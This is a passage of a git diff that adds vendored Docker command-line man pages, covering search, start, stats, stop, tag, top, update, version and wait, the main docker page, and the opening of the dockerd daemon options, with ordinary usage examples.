+June 2014, updated by Sven Dowideit +November 2014, updated by Sven Dowideit diff --git a/vendor/github.com/docker/docker/man/docker-search.1.md b/vendor/github.com/docker/docker/man/docker-search.1.md new file mode 100644 index 0000000000..ad8bbc78b2 --- /dev/null +++ b/vendor/github.com/docker/docker/man/docker-search.1.md @@ -0,0 +1,70 @@ +% DOCKER(1) Docker User Manuals +% Docker Community +% JUNE 2014 +# NAME +docker-search - Search the Docker Hub for images + +# SYNOPSIS +**docker search** +[**-f**|**--filter**[=*[]*]] +[**--help**] +[**--limit**[=*LIMIT*]] +[**--no-trunc**] +TERM + +# DESCRIPTION + +Search Docker Hub for images that match the specified `TERM`. The table +of images returned displays the name, description (truncated by default), number +of stars awarded, whether the image is official, and whether it is automated. + +*Note* - Search queries will only return up to 25 results + +# OPTIONS + +**-f**, **--filter**=[] + Filter output based on these conditions: + - stars= + - is-automated=(true|false) + - is-official=(true|false) + +**--help** + Print usage statement + +**--limit**=*LIMIT* + Maximum returned search results. The default is 25. + +**--no-trunc**=*true*|*false* + Don't truncate output. The default is *false*. + +# EXAMPLES + +## Search Docker Hub for ranked images + +Search a registry for the term 'fedora' and only display those images +ranked 3 or higher: + + $ docker search --filter=stars=3 fedora + NAME DESCRIPTION STARS OFFICIAL AUTOMATED + mattdm/fedora A basic Fedora image corresponding roughly... 50 + fedora (Semi) Official Fedora base image. 38 + mattdm/fedora-small A small Fedora image on which to build. Co... 8 + goldmann/wildfly A WildFly application server running on a ... 
3 [OK] + +## Search Docker Hub for automated images + +Search Docker Hub for the term 'fedora' and only display automated images +ranked 1 or higher: + + $ docker search --filter=is-automated=true --filter=stars=1 fedora + NAME DESCRIPTION STARS OFFICIAL AUTOMATED + goldmann/wildfly A WildFly application server running on a ... 3 [OK] + tutum/fedora-20 Fedora 20 image with SSH access. For the r... 1 [OK] + +# HISTORY +April 2014, Originally compiled by William Henry (whenry at redhat dot com) +based on docker.com source material and internal work. +June 2014, updated by Sven Dowideit +April 2015, updated by Mary Anthony for v2 +April 2016, updated by Vincent Demeester + diff --git a/vendor/github.com/docker/docker/man/docker-start.1.md b/vendor/github.com/docker/docker/man/docker-start.1.md new file mode 100644 index 0000000000..c00b0a1668 --- /dev/null +++ b/vendor/github.com/docker/docker/man/docker-start.1.md @@ -0,0 +1,39 @@ +% DOCKER(1) Docker User Manuals +% Docker Community +% JUNE 2014 +# NAME +docker-start - Start one or more containers + +# SYNOPSIS +**docker start** +[**-a**|**--attach**] +[**--detach-keys**[=*[]*]] +[**--help**] +[**-i**|**--interactive**] +CONTAINER [CONTAINER...] + +# DESCRIPTION + +Start one or more containers. + +# OPTIONS +**-a**, **--attach**=*true*|*false* + Attach container's STDOUT and STDERR and forward all signals to the + process. The default is *false*. + +**--detach-keys**="" + Override the key sequence for detaching a container. Format is a single character `[a-Z]` or `ctrl-` where `` is one of: `a-z`, `@`, `^`, `[`, `,` or `_`. + +**--help** + Print usage statement + +**-i**, **--interactive**=*true*|*false* + Attach container's STDIN. The default is *false*. + +# See also +**docker-stop(1)** to stop a container. + +# HISTORY +April 2014, Originally compiled by William Henry (whenry at redhat dot com) +based on docker.com source material and internal work. 
+June 2014, updated by Sven Dowideit diff --git a/vendor/github.com/docker/docker/man/docker-stats.1.md b/vendor/github.com/docker/docker/man/docker-stats.1.md new file mode 100644 index 0000000000..0f022cd412 --- /dev/null +++ b/vendor/github.com/docker/docker/man/docker-stats.1.md @@ -0,0 +1,57 @@ +% DOCKER(1) Docker User Manuals +% Docker Community +% JUNE 2014 +# NAME +docker-stats - Display a live stream of one or more containers' resource usage statistics + +# SYNOPSIS +**docker stats** +[**-a**|**--all**] +[**--help**] +[**--no-stream**] +[**--format[="*TEMPLATE*"]**] +[CONTAINER...] + +# DESCRIPTION + +Display a live stream of one or more containers' resource usage statistics + +# OPTIONS +**-a**, **--all**=*true*|*false* + Show all containers. Only running containers are shown by default. The default is *false*. + +**--help** + Print usage statement + +**--no-stream**=*true*|*false* + Disable streaming stats and only pull the first result, default setting is false. + +**--format**="*TEMPLATE*" + Pretty-print containers statistics using a Go template. + Valid placeholders: + .Container - Container name or ID. + .Name - Container name. + .ID - Container ID. + .CPUPerc - CPU percentage. + .MemUsage - Memory usage. + .NetIO - Network IO. + .BlockIO - Block IO. + .MemPerc - Memory percentage (Not available on Windows). + .PIDs - Number of PIDs (Not available on Windows). + +# EXAMPLES + +Running `docker stats` on all running containers + + $ docker stats + CONTAINER CPU % MEM USAGE / LIMIT MEM % NET I/O BLOCK I/O + 1285939c1fd3 0.07% 796 KiB / 64 MiB 1.21% 788 B / 648 B 3.568 MB / 512 KB + 9c76f7834ae2 0.07% 2.746 MiB / 64 MiB 4.29% 1.266 KB / 648 B 12.4 MB / 0 B + d1ea048f04e4 0.03% 4.583 MiB / 64 MiB 6.30% 2.854 KB / 648 B 27.7 MB / 0 B + +Running `docker stats` on multiple containers by name and id. 
+
+ $ docker stats fervent_panini 5acfcb1b4fd1
+ CONTAINER CPU % MEM USAGE/LIMIT MEM % NET I/O
+ 5acfcb1b4fd1 0.00% 115.2 MiB/1.045 GiB 11.03% 1.422 kB/648 B
+ fervent_panini 0.02% 11.08 MiB/1.045 GiB 1.06% 648 B/648 B
diff --git a/vendor/github.com/docker/docker/man/docker-stop.1.md b/vendor/github.com/docker/docker/man/docker-stop.1.md
new file mode 100644
index 0000000000..fa377c92c4
--- /dev/null
+++ b/vendor/github.com/docker/docker/man/docker-stop.1.md
@@ -0,0 +1,30 @@
+% DOCKER(1) Docker User Manuals
+% Docker Community
+% JUNE 2014
+# NAME
+docker-stop - Stop a container by sending SIGTERM and then SIGKILL after a grace period
+
+# SYNOPSIS
+**docker stop**
+[**--help**]
+[**-t**|**--time**[=*10*]]
+CONTAINER [CONTAINER...]
+
+# DESCRIPTION
+Stop a container (Send SIGTERM, and then SIGKILL after
+ grace period)
+
+# OPTIONS
+**--help**
+ Print usage statement
+
+**-t**, **--time**=*10*
+ Number of seconds to wait for the container to stop before killing it. Default is 10 seconds.
+
+# See also
+**docker-start(1)** to restart a stopped container.
+
+# HISTORY
+April 2014, Originally compiled by William Henry (whenry at redhat dot com)
+based on docker.com source material and internal work.
+June 2014, updated by Sven Dowideit
diff --git a/vendor/github.com/docker/docker/man/docker-tag.1.md b/vendor/github.com/docker/docker/man/docker-tag.1.md
new file mode 100644
index 0000000000..7f27e1b0e1
--- /dev/null
+++ b/vendor/github.com/docker/docker/man/docker-tag.1.md
@@ -0,0 +1,76 @@
+% DOCKER(1) Docker User Manuals
+% Docker Community
+% JUNE 2014
+# NAME
+docker-tag - Create a tag `TARGET_IMAGE` that refers to `SOURCE_IMAGE`
+
+# SYNOPSIS
+**docker tag**
+[**--help**]
+SOURCE_NAME[:TAG] TARGET_NAME[:TAG]
+
+# DESCRIPTION
+Assigns a new alias to an image in a registry. An alias refers to the
+entire image name including the optional `TAG` after the ':'.
+
+# "OPTIONS"
+**--help**
+ Print usage statement.
+ +**NAME** + The image name which is made up of slash-separated name components, + optionally prefixed by a registry hostname. The hostname must comply with + standard DNS rules, but may not contain underscores. If a hostname is + present, it may optionally be followed by a port number in the format + `:8080`. If not present, the command uses Docker's public registry located at + `registry-1.docker.io` by default. Name components may contain lowercase + characters, digits and separators. A separator is defined as a period, one or + two underscores, or one or more dashes. A name component may not start or end + with a separator. + +**TAG** + The tag assigned to the image to version and distinguish images with the same + name. The tag name may contain lowercase and uppercase characters, digits, + underscores, periods and dashes. A tag name may not start with a period or a + dash and may contain a maximum of 128 characters. + +# EXAMPLES + +## Tagging an image referenced by ID + +To tag a local image with ID "0e5574283393" into the "fedora" repository with +"version1.0": + + docker tag 0e5574283393 fedora/httpd:version1.0 + +## Tagging an image referenced by Name + +To tag a local image with name "httpd" into the "fedora" repository with +"version1.0": + + docker tag httpd fedora/httpd:version1.0 + +Note that since the tag name is not specified, the alias is created for an +existing local version `httpd:latest`. + +## Tagging an image referenced by Name and Tag + +To tag a local image with name "httpd" and tag "test" into the "fedora" +repository with "version1.0.test": + + docker tag httpd:test fedora/httpd:version1.0.test + +## Tagging an image for a private repository + +To push an image to a private registry and not the central Docker +registry you must tag it with the registry hostname and port (if needed). 
+ + docker tag 0e5574283393 myregistryhost:5000/fedora/httpd:version1.0 + +# HISTORY +April 2014, Originally compiled by William Henry (whenry at redhat dot com) +based on docker.com source material and internal work. +June 2014, updated by Sven Dowideit +July 2014, updated by Sven Dowideit +April 2015, updated by Mary Anthony for v2 +June 2015, updated by Sally O'Malley diff --git a/vendor/github.com/docker/docker/man/docker-top.1.md b/vendor/github.com/docker/docker/man/docker-top.1.md new file mode 100644 index 0000000000..a666f7cd37 --- /dev/null +++ b/vendor/github.com/docker/docker/man/docker-top.1.md @@ -0,0 +1,36 @@ +% DOCKER(1) Docker User Manuals +% Docker Community +% JUNE 2014 +# NAME +docker-top - Display the running processes of a container + +# SYNOPSIS +**docker top** +[**--help**] +CONTAINER [ps OPTIONS] + +# DESCRIPTION + +Display the running process of the container. ps-OPTION can be any of the options you would pass to a Linux ps command. + +All displayed information is from host's point of view. + +# OPTIONS +**--help** + Print usage statement + +# EXAMPLES + +Run **docker top** with the ps option of -x: + + $ docker top 8601afda2b -x + PID TTY STAT TIME COMMAND + 16623 ? Ss 0:00 sleep 99999 + + +# HISTORY +April 2014, Originally compiled by William Henry (whenry at redhat dot com) +based on docker.com source material and internal work. +June 2014, updated by Sven Dowideit +June 2015, updated by Ma Shimiao +December 2015, updated by Pavel Pospisil diff --git a/vendor/github.com/docker/docker/man/docker-unpause.1.md b/vendor/github.com/docker/docker/man/docker-unpause.1.md new file mode 100644 index 0000000000..e6fd3c4e01 --- /dev/null +++ b/vendor/github.com/docker/docker/man/docker-unpause.1.md @@ -0,0 +1,28 @@ +% DOCKER(1) Docker User Manuals +% Docker Community +% JUNE 2014 +# NAME +docker-unpause - Unpause all processes within one or more containers + +# SYNOPSIS +**docker unpause** +CONTAINER [CONTAINER...] 
+ +# DESCRIPTION + +The `docker unpause` command un-suspends all processes in the specified containers. +On Linux, it does this using the cgroups freezer. + +See the [cgroups freezer documentation] +(https://www.kernel.org/doc/Documentation/cgroup-v1/freezer-subsystem.txt) for +further details. + +# OPTIONS +**--help** + Print usage statement + +# See also +**docker-pause(1)** to pause all processes within one or more containers. + +# HISTORY +June 2014, updated by Sven Dowideit diff --git a/vendor/github.com/docker/docker/man/docker-update.1.md b/vendor/github.com/docker/docker/man/docker-update.1.md new file mode 100644 index 0000000000..85f3dd07c1 --- /dev/null +++ b/vendor/github.com/docker/docker/man/docker-update.1.md @@ -0,0 +1,171 @@ +% DOCKER(1) Docker User Manuals +% Docker Community +% JUNE 2014 +# NAME +docker-update - Update configuration of one or more containers + +# SYNOPSIS +**docker update** +[**--blkio-weight**[=*[BLKIO-WEIGHT]*]] +[**--cpu-shares**[=*0*]] +[**--cpu-period**[=*0*]] +[**--cpu-quota**[=*0*]] +[**--cpu-rt-period**[=*0*]] +[**--cpu-rt-runtime**[=*0*]] +[**--cpuset-cpus**[=*CPUSET-CPUS*]] +[**--cpuset-mems**[=*CPUSET-MEMS*]] +[**--help**] +[**--kernel-memory**[=*KERNEL-MEMORY*]] +[**-m**|**--memory**[=*MEMORY*]] +[**--memory-reservation**[=*MEMORY-RESERVATION*]] +[**--memory-swap**[=*MEMORY-SWAP*]] +[**--restart**[=*""*]] +CONTAINER [CONTAINER...] + +# DESCRIPTION + +The **docker update** command dynamically updates container configuration. +You can use this command to prevent containers from consuming too many +resources from their Docker host. With a single command, you can place +limits on a single container or on many. To specify more than one container, +provide space-separated list of container names or IDs. + +With the exception of the **--kernel-memory** option, you can specify these +options on a running or a stopped container. 
On kernel version older than
+4.6, you can only update **--kernel-memory** on a stopped container or on
+a running container with kernel memory initialized.
+
+# OPTIONS
+
+**--blkio-weight**=0
+ Block IO weight (relative weight) accepts a weight value between 10 and 1000.
+
+**--cpu-shares**=0
+ CPU shares (relative weight)
+
+**--cpu-period**=0
+ Limit the CPU CFS (Completely Fair Scheduler) period
+
+ Limit the container's CPU usage. This flag tells the kernel to restrict the container's CPU usage to the period you specify.
+
+**--cpu-quota**=0
+ Limit the CPU CFS (Completely Fair Scheduler) quota
+
+**--cpu-rt-period**=0
+ Limit the CPU real-time period in microseconds
+
+ Limit the container's Real Time CPU usage. This flag tells the kernel to restrict the container's Real Time CPU usage to the period you specify.
+
+**--cpu-rt-runtime**=0
+ Limit the CPU real-time runtime in microseconds
+
+ Limit the container's Real Time CPU usage. This flag tells the kernel to limit the amount of time in a given CPU period Real Time tasks may consume. Ex:
+ Period of 1,000,000us and Runtime of 950,000us means that this container could consume 95% of available CPU and leave the remaining 5% to normal priority tasks.
+
+ The sum of all runtimes across containers cannot exceed the amount allotted to the parent cgroup.
+
+**--cpuset-cpus**=""
+ CPUs in which to allow execution (0-3, 0,1)
+
+**--cpuset-mems**=""
+ Memory nodes(MEMs) in which to allow execution (0-3, 0,1). Only effective on NUMA systems.
+
+**--help**
+ Print usage statement
+
+**--kernel-memory**=""
+ Kernel memory limit (format: `[]`, where unit = b, k, m or g)
+
+ Note that on kernel versions older than 4.6, you cannot update kernel memory on
+ a running container if the container is started without kernel memory initialized;
+ in this case, it can only be updated after it's stopped. The new setting takes
+ effect when the container is started.
+
+**-m**, **--memory**=""
+ Memory limit (format: , where unit = b, k, m or g)
+
+ Note that the memory should be smaller than the already set swap memory limit.
+ If you want to update a memory limit bigger than the already set swap memory limit,
+ you should update the swap memory limit at the same time. If you don't set swap memory
+ limit on docker create/run but only memory limit, the swap memory is double
+ the memory limit.
+
+**--memory-reservation**=""
+ Memory soft limit (format: [], where unit = b, k, m or g)
+
+**--memory-swap**=""
+ Total memory limit (memory + swap)
+
+**--restart**=""
+ Restart policy to apply when a container exits (no, on-failure[:max-retry], always, unless-stopped).
+
+# EXAMPLES
+
+The following sections illustrate ways to use this command.
+
+### Update a container's cpu-shares
+
+To limit a container's cpu-shares to 512, first identify the container
+name or ID. You can use **docker ps** to find these values. You can also
+use the ID returned from the **docker run** command. Then, do the following:
+
+```bash
+$ docker update --cpu-shares 512 abebf7571666
+```
+
+### Update a container with cpu-shares and memory
+
+To update multiple resource configurations for multiple containers:
+
+```bash
+$ docker update --cpu-shares 512 -m 300M abebf7571666 hopeful_morse
+```
+
+### Update a container's kernel memory constraints
+
+You can update a container's kernel memory limit using the **--kernel-memory**
+option. On kernel versions older than 4.6, this option can be updated on a
+running container only if the container was started with **--kernel-memory**.
+If the container was started *without* **--kernel-memory**, you need to stop
+the container before updating kernel memory.
+ +For example, if you started a container with this command: + +```bash +$ docker run -dit --name test --kernel-memory 50M ubuntu bash +``` + +You can update kernel memory while the container is running: + +```bash +$ docker update --kernel-memory 80M test +``` + +If you started a container *without* kernel memory initialized: + +```bash +$ docker run -dit --name test2 --memory 300M ubuntu bash +``` + +Update kernel memory of running container `test2` will fail. You need to stop +the container before updating the **--kernel-memory** setting. The next time you +start it, the container uses the new value. + +Kernel version newer than (include) 4.6 does not have this limitation, you +can use `--kernel-memory` the same way as other options. + +### Update a container's restart policy + +You can change a container's restart policy on a running container. The new +restart policy takes effect instantly after you run `docker update` on a +container. + +To update restart policy for one or more containers: + +```bash +$ docker update --restart=on-failure:3 abebf7571666 hopeful_morse +``` + +Note that if the container is started with "--rm" flag, you cannot update the restart +policy for it. The `AutoRemove` and `RestartPolicy` are mutually exclusive for the +container. diff --git a/vendor/github.com/docker/docker/man/docker-version.1.md b/vendor/github.com/docker/docker/man/docker-version.1.md new file mode 100644 index 0000000000..1838f82052 --- /dev/null +++ b/vendor/github.com/docker/docker/man/docker-version.1.md @@ -0,0 +1,62 @@ +% DOCKER(1) Docker User Manuals +% Docker Community +% JUNE 2015 +# NAME +docker-version - Show the Docker version information. + +# SYNOPSIS +**docker version** +[**--help**] +[**-f**|**--format**[=*FORMAT*]] + +# DESCRIPTION +This command displays version information for both the Docker client and +daemon. + +# OPTIONS +**--help** + Print usage statement + +**-f**, **--format**="" + Format the output using the given Go template. 
+ +# EXAMPLES + +## Display Docker version information + +The default output: + + $ docker version + Client: + Version: 1.8.0 + API version: 1.20 + Go version: go1.4.2 + Git commit: f5bae0a + Built: Tue Jun 23 17:56:00 UTC 2015 + OS/Arch: linux/amd64 + + Server: + Version: 1.8.0 + API version: 1.20 + Go version: go1.4.2 + Git commit: f5bae0a + Built: Tue Jun 23 17:56:00 UTC 2015 + OS/Arch: linux/amd64 + +Get server version: + + $ docker version --format '{{.Server.Version}}' + 1.8.0 + +Dump raw data: + +To view all available fields, you can use the format `{{json .}}`. + + $ docker version --format '{{json .}}' + {"Client":{"Version":"1.8.0","ApiVersion":"1.20","GitCommit":"f5bae0a","GoVersion":"go1.4.2","Os":"linux","Arch":"amd64","BuildTime":"Tue Jun 23 17:56:00 UTC 2015"},"ServerOK":true,"Server":{"Version":"1.8.0","ApiVersion":"1.20","GitCommit":"f5bae0a","GoVersion":"go1.4.2","Os":"linux","Arch":"amd64","KernelVersion":"3.13.2-gentoo","BuildTime":"Tue Jun 23 17:56:00 UTC 2015"}} + + +# HISTORY +June 2014, updated by Sven Dowideit +June 2015, updated by John Howard +June 2015, updated by Patrick Hemmer diff --git a/vendor/github.com/docker/docker/man/docker-wait.1.md b/vendor/github.com/docker/docker/man/docker-wait.1.md new file mode 100644 index 0000000000..678800966b --- /dev/null +++ b/vendor/github.com/docker/docker/man/docker-wait.1.md @@ -0,0 +1,30 @@ +% DOCKER(1) Docker User Manuals +% Docker Community +% JUNE 2014 +# NAME +docker-wait - Block until one or more containers stop, then print their exit codes + +# SYNOPSIS +**docker wait** +[**--help**] +CONTAINER [CONTAINER...] + +# DESCRIPTION + +Block until one or more containers stop, then print their exit codes. 
+ +# OPTIONS +**--help** + Print usage statement + +# EXAMPLES + + $ docker run -d fedora sleep 99 + 079b83f558a2bc52ecad6b2a5de13622d584e6bb1aea058c11b36511e85e7622 + $ docker wait 079b83f558a2bc + 0 + +# HISTORY +April 2014, Originally compiled by William Henry (whenry at redhat dot com) +based on docker.com source material and internal work. +June 2014, updated by Sven Dowideit diff --git a/vendor/github.com/docker/docker/man/docker.1.md b/vendor/github.com/docker/docker/man/docker.1.md new file mode 100644 index 0000000000..2a96184439 --- /dev/null +++ b/vendor/github.com/docker/docker/man/docker.1.md @@ -0,0 +1,237 @@ +% DOCKER(1) Docker User Manuals +% William Henry +% APRIL 2014 +# NAME +docker \- Docker image and container command line interface + +# SYNOPSIS +**docker** [OPTIONS] COMMAND [ARG...] + +**docker** daemon [--help|...] + +**docker** [--help|-v|--version] + +# DESCRIPTION +is a client for interacting with the daemon (see **dockerd(8)**) through the CLI. + +The Docker CLI has over 30 commands. The commands are listed below and each has +its own man page which explain usage and arguments. + +To see the man page for a command run **man docker **. + +# OPTIONS +**--help** + Print usage statement + +**--config**="" + Specifies the location of the Docker client configuration files. The default is '~/.docker'. + +**-D**, **--debug**=*true*|*false* + Enable debug mode. Default is false. + +**-H**, **--host**=[*unix:///var/run/docker.sock*]: tcp://[host]:[port][path] to bind or +unix://[/path/to/socket] to use. + The socket(s) to bind to in daemon mode specified using one or more + tcp://host:port/path, unix:///path/to/socket, fd://* or fd://socketfd. + If the tcp port is not specified, then it will default to either `2375` when + `--tls` is off, or `2376` when `--tls` is on, or `--tlsverify` is specified. + +**-l**, **--log-level**="*debug*|*info*|*warn*|*error*|*fatal*" + Set the logging level. Default is `info`. 
+ +**--tls**=*true*|*false* + Use TLS; implied by --tlsverify. Default is false. + +**--tlscacert**=*~/.docker/ca.pem* + Trust certs signed only by this CA. + +**--tlscert**=*~/.docker/cert.pem* + Path to TLS certificate file. + +**--tlskey**=*~/.docker/key.pem* + Path to TLS key file. + +**--tlsverify**=*true*|*false* + Use TLS and verify the remote (daemon: verify client, client: verify daemon). + Default is false. + +**-v**, **--version**=*true*|*false* + Print version information and quit. Default is false. + +# COMMANDS +**attach** + Attach to a running container + See **docker-attach(1)** for full documentation on the **attach** command. + +**build** + Build an image from a Dockerfile + See **docker-build(1)** for full documentation on the **build** command. + +**commit** + Create a new image from a container's changes + See **docker-commit(1)** for full documentation on the **commit** command. + +**cp** + Copy files/folders between a container and the local filesystem + See **docker-cp(1)** for full documentation on the **cp** command. + +**create** + Create a new container + See **docker-create(1)** for full documentation on the **create** command. + +**diff** + Inspect changes on a container's filesystem + See **docker-diff(1)** for full documentation on the **diff** command. + +**events** + Get real time events from the server + See **docker-events(1)** for full documentation on the **events** command. + +**exec** + Run a command in a running container + See **docker-exec(1)** for full documentation on the **exec** command. + +**export** + Stream the contents of a container as a tar archive + See **docker-export(1)** for full documentation on the **export** command. + +**history** + Show the history of an image + See **docker-history(1)** for full documentation on the **history** command. + +**images** + List images + See **docker-images(1)** for full documentation on the **images** command. 
+ +**import** + Create a new filesystem image from the contents of a tarball + See **docker-import(1)** for full documentation on the **import** command. + +**info** + Display system-wide information + See **docker-info(1)** for full documentation on the **info** command. + +**inspect** + Return low-level information on a container or image + See **docker-inspect(1)** for full documentation on the **inspect** command. + +**kill** + Kill a running container (which includes the wrapper process and everything +inside it) + See **docker-kill(1)** for full documentation on the **kill** command. + +**load** + Load an image from a tar archive + See **docker-load(1)** for full documentation on the **load** command. + +**login** + Log in to a Docker Registry + See **docker-login(1)** for full documentation on the **login** command. + +**logout** + Log the user out of a Docker Registry + See **docker-logout(1)** for full documentation on the **logout** command. + +**logs** + Fetch the logs of a container + See **docker-logs(1)** for full documentation on the **logs** command. + +**pause** + Pause all processes within a container + See **docker-pause(1)** for full documentation on the **pause** command. + +**port** + Lookup the public-facing port which is NAT-ed to PRIVATE_PORT + See **docker-port(1)** for full documentation on the **port** command. + +**ps** + List containers + See **docker-ps(1)** for full documentation on the **ps** command. + +**pull** + Pull an image or a repository from a Docker Registry + See **docker-pull(1)** for full documentation on the **pull** command. + +**push** + Push an image or a repository to a Docker Registry + See **docker-push(1)** for full documentation on the **push** command. + +**rename** + Rename a container. + See **docker-rename(1)** for full documentation on the **rename** command. + +**restart** + Restart one or more containers + See **docker-restart(1)** for full documentation on the **restart** command. 
+ +**rm** + Remove one or more containers + See **docker-rm(1)** for full documentation on the **rm** command. + +**rmi** + Remove one or more images + See **docker-rmi(1)** for full documentation on the **rmi** command. + +**run** + Run a command in a new container + See **docker-run(1)** for full documentation on the **run** command. + +**save** + Save an image to a tar archive + See **docker-save(1)** for full documentation on the **save** command. + +**search** + Search for an image in the Docker index + See **docker-search(1)** for full documentation on the **search** command. + +**start** + Start a container + See **docker-start(1)** for full documentation on the **start** command. + +**stats** + Display a live stream of one or more containers' resource usage statistics + See **docker-stats(1)** for full documentation on the **stats** command. + +**stop** + Stop a container + See **docker-stop(1)** for full documentation on the **stop** command. + +**tag** + Tag an image into a repository + See **docker-tag(1)** for full documentation on the **tag** command. + +**top** + Lookup the running processes of a container + See **docker-top(1)** for full documentation on the **top** command. + +**unpause** + Unpause all processes within a container + See **docker-unpause(1)** for full documentation on the **unpause** command. + +**version** + Show the Docker version information + See **docker-version(1)** for full documentation on the **version** command. + +**wait** + Block until a container stops, then print its exit code + See **docker-wait(1)** for full documentation on the **wait** command. + + +# RUNTIME EXECUTION OPTIONS + +Use the **--exec-opt** flags to specify options to the execution driver. +The following options are available: + +#### native.cgroupdriver +Specifies the management of the container's `cgroups`. You can specify `cgroupfs` +or `systemd`. If you specify `systemd` and it is not available, the system errors +out. 
+ +#### Client +For specific client examples please see the man page for the specific Docker +command. For example: + + man docker-run + +# HISTORY +April 2014, Originally compiled by William Henry (whenry at redhat dot com) based on docker.com source material and internal work. diff --git a/vendor/github.com/docker/docker/man/dockerd.8.md b/vendor/github.com/docker/docker/man/dockerd.8.md new file mode 100644 index 0000000000..761dc6b9be --- /dev/null +++ b/vendor/github.com/docker/docker/man/dockerd.8.md @@ -0,0 +1,710 @@ +% DOCKER(8) Docker User Manuals +% Shishir Mahajan +% SEPTEMBER 2015 +# NAME +dockerd - Enable daemon mode + +# SYNOPSIS +**dockerd** +[**--add-runtime**[=*[]*]] +[**--api-cors-header**=[=*API-CORS-HEADER*]] +[**--authorization-plugin**[=*[]*]] +[**-b**|**--bridge**[=*BRIDGE*]] +[**--bip**[=*BIP*]] +[**--cgroup-parent**[=*[]*]] +[**--cluster-store**[=*[]*]] +[**--cluster-advertise**[=*[]*]] +[**--cluster-store-opt**[=*map[]*]] +[**--config-file**[=*/etc/docker/daemon.json*]] +[**--containerd**[=*SOCKET-PATH*]] +[**-D**|**--debug**] +[**--default-gateway**[=*DEFAULT-GATEWAY*]] +[**--default-gateway-v6**[=*DEFAULT-GATEWAY-V6*]] +[**--default-runtime**[=*runc*]] +[**--default-ulimit**[=*[]*]] +[**--disable-legacy-registry**] +[**--dns**[=*[]*]] +[**--dns-opt**[=*[]*]] +[**--dns-search**[=*[]*]] +[**--exec-opt**[=*[]*]] +[**--exec-root**[=*/var/run/docker*]] +[**--experimental**[=*false*]] +[**--fixed-cidr**[=*FIXED-CIDR*]] +[**--fixed-cidr-v6**[=*FIXED-CIDR-V6*]] +[**-G**|**--group**[=*docker*]] +[**-g**|**--graph**[=*/var/lib/docker*]] +[**-H**|**--host**[=*[]*]] +[**--help**] +[**--icc**[=*true*]] +[**--init**[=*false*]] +[**--init-path**[=*""*]] +[**--insecure-registry**[=*[]*]] +[**--ip**[=*0.0.0.0*]] +[**--ip-forward**[=*true*]] +[**--ip-masq**[=*true*]] +[**--iptables**[=*true*]] +[**--ipv6**] +[**--isolation**[=*default*]] +[**-l**|**--log-level**[=*info*]] +[**--label**[=*[]*]] +[**--live-restore**[=*false*]] 
+[**--log-driver**[=*json-file*]] +[**--log-opt**[=*map[]*]] +[**--mtu**[=*0*]] +[**--max-concurrent-downloads**[=*3*]] +[**--max-concurrent-uploads**[=*5*]] +[**-p**|**--pidfile**[=*/var/run/docker.pid*]] +[**--raw-logs**] +[**--registry-mirror**[=*[]*]] +[**-s**|**--storage-driver**[=*STORAGE-DRIVER*]] +[**--seccomp-profile**[=*SECCOMP-PROFILE-PATH*]] +[**--selinux-enabled**] +[**--shutdown-timeout**[=*15*]] +[**--storage-opt**[=*[]*]] +[**--swarm-default-advertise-addr**[=*IP|INTERFACE*]] +[**--tls**] +[**--tlscacert**[=*~/.docker/ca.pem*]] +[**--tlscert**[=*~/.docker/cert.pem*]] +[**--tlskey**[=*~/.docker/key.pem*]] +[**--tlsverify**] +[**--userland-proxy**[=*true*]] +[**--userland-proxy-path**[=*""*]] +[**--userns-remap**[=*default*]] + +# DESCRIPTION +**dockerd** is used for starting the Docker daemon (i.e., to command the daemon +to manage images, containers etc). So **dockerd** is a server, as a daemon. + +To run the Docker daemon you can specify **dockerd**. +You can check the daemon options using **dockerd --help**. +Daemon options should be specified after the **dockerd** keyword in the +following format. + +**dockerd [OPTIONS]** + +# OPTIONS + +**--add-runtime**=[] + Runtimes can be registered with the daemon either via the +configuration file or using the `--add-runtime` command line argument. + + The following is an example adding 2 runtimes via the configuration: + +```json +{ + "default-runtime": "runc", + "runtimes": { + "runc": { + "path": "runc" + }, + "custom": { + "path": "/usr/local/bin/my-runc-replacement", + "runtimeArgs": [ + "--debug" + ] + } + } +} +``` + + This is the same example via the command line: + +```bash +$ sudo dockerd --add-runtime runc=runc --add-runtime custom=/usr/local/bin/my-runc-replacement +``` + + **Note**: defining runtime arguments via the command line is not supported. + +**--api-cors-header**="" + Set CORS headers in the Engine API. Default is cors disabled. Give urls like + "http://foo, http://bar, ...". 
Give "*" to allow all. + +**--authorization-plugin**="" + Set authorization plugins to load + +**-b**, **--bridge**="" + Attach containers to a pre\-existing network bridge; use 'none' to disable + container networking + +**--bip**="" + Use the provided CIDR notation address for the dynamically created bridge + (docker0); Mutually exclusive of \-b + +**--cgroup-parent**="" + Set parent cgroup for all containers. Default is "/docker" for fs cgroup + driver and "system.slice" for systemd cgroup driver. + +**--cluster-store**="" + URL of the distributed storage backend + +**--cluster-advertise**="" + Specifies the 'host:port' or `interface:port` combination that this + particular daemon instance should use when advertising itself to the cluster. + The daemon is reached through this value. + +**--cluster-store-opt**="" + Specifies options for the Key/Value store. + +**--config-file**="/etc/docker/daemon.json" + Specifies the JSON file path to load the configuration from. + +**--containerd**="" + Path to containerd socket. + +**-D**, **--debug**=*true*|*false* + Enable debug mode. Default is false. + +**--default-gateway**="" + IPv4 address of the container default gateway; this address must be part of + the bridge subnet (which is defined by \-b or \--bip) + +**--default-gateway-v6**="" + IPv6 address of the container default gateway + +**--default-runtime**="runc" + Set default runtime if there're more than one specified by `--add-runtime`. + +**--default-ulimit**=[] + Default ulimits for containers. + +**--disable-legacy-registry**=*true*|*false* + Disable contacting legacy registries + +**--dns**="" + Force Docker to use specific DNS servers + +**--dns-opt**="" + DNS options to use. + +**--dns-search**=[] + DNS search domains to use. + +**--exec-opt**=[] + Set runtime execution options. See RUNTIME EXECUTION OPTIONS. + +**--exec-root**="" + Path to use as the root of the Docker execution state files. Default is + `/var/run/docker`. 
